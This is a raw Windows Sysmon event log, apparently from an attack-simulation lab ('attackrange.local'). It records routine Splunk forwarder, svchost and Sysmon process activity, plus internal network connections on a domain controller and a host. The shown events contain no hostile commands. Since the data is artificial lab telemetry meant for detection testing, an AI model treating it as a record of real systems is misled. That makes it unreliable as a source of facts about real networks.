19:18:14.029{761B69BB-818C-607D-1600-00000000BA01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1147-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local389ldap 23542300x80000000000000001095125Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:18.554{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EC90D6356FC31D402EEF45941494EDE,SHA256=630057944AFCB3193D6AE7DF84CBCF163BF32733618FED8CC5F04D1F14182777,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095124Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:18.503{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095123Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:18.503{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095122Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:18.142{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D7FB2C806A237775C188259793167B,SHA256=8A90DA2EEE590650E18C52BB182B42E2D892E8463C2CD40F79DAD1E18E9814BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606101Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:14.689{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49730-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606100Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:18.083{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606099Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:18.083{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62DC3782606FA24BCBC6F97CB07943B9,SHA256=DF8D2E13160A28E91A7CD82604D72E4B8ABD425A4BA8B87BB45A37C0F4681012falsefalse - insufficient disk space 354300x80000000000000001095158Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.783{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1152-false10.0.1.12-8000- 10341000x80000000000000001095157Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.719{761B69BB-7A7B-6080-995F-00000000BA01}48844916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095156Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.585{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A7B-6080-995F-00000000BA01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095155Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.584{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095154Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.584{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095153Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.583{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095152Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.583{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095151Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.583{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-7A7B-6080-995F-00000000BA01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095150Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.583{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A7B-6080-995F-00000000BA01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095149Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.582{761B69BB-7A7B-6080-995F-00000000BA01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095148Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.546{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84F9373943F28798188AD93488077286,SHA256=C0B59DF015A327A12D8ED35AEA82CDE0732E02F414A9C36A3331B16B522D38A5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095147Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.504{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095146Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.504{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095145Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.228{761B69BB-7A7B-6080-985F-00000000BA01}57283196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095144Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.153{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=739C7D81CA25ACFC931C578063367487,SHA256=769D1221F7FCBA723C04AF189BE0ABEE2C11006500225EA5030D3D79A2CCAFE2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606103Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:19.085{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606102Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:19.085{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A254E7E44721BA16694BF9A93120A2B,SHA256=B8F0E8179308015BF2E9A9DBCEC5856DB097B832E1C878C061464F9FCDEDCA00falsefalse - insufficient disk space 10341000x80000000000000001095143Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.083{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A7B-6080-985F-00000000BA01}5728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095142Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.082{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095141Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.081{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095140Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.081{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095139Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.081{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095138Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.081{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-7A7B-6080-985F-00000000BA01}5728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095137Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.081{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A7B-6080-985F-00000000BA01}5728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095136Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.080{761B69BB-7A7B-6080-985F-00000000BA01}5728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095201Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.592{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5022EB0530A10044104A0EDB94B8621,SHA256=5DA7BD3326F5C1E2E033CAFE171308D45BFC87866F6A050BFBD23ECBCC01FCB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095200Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.505{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095199Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.505{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 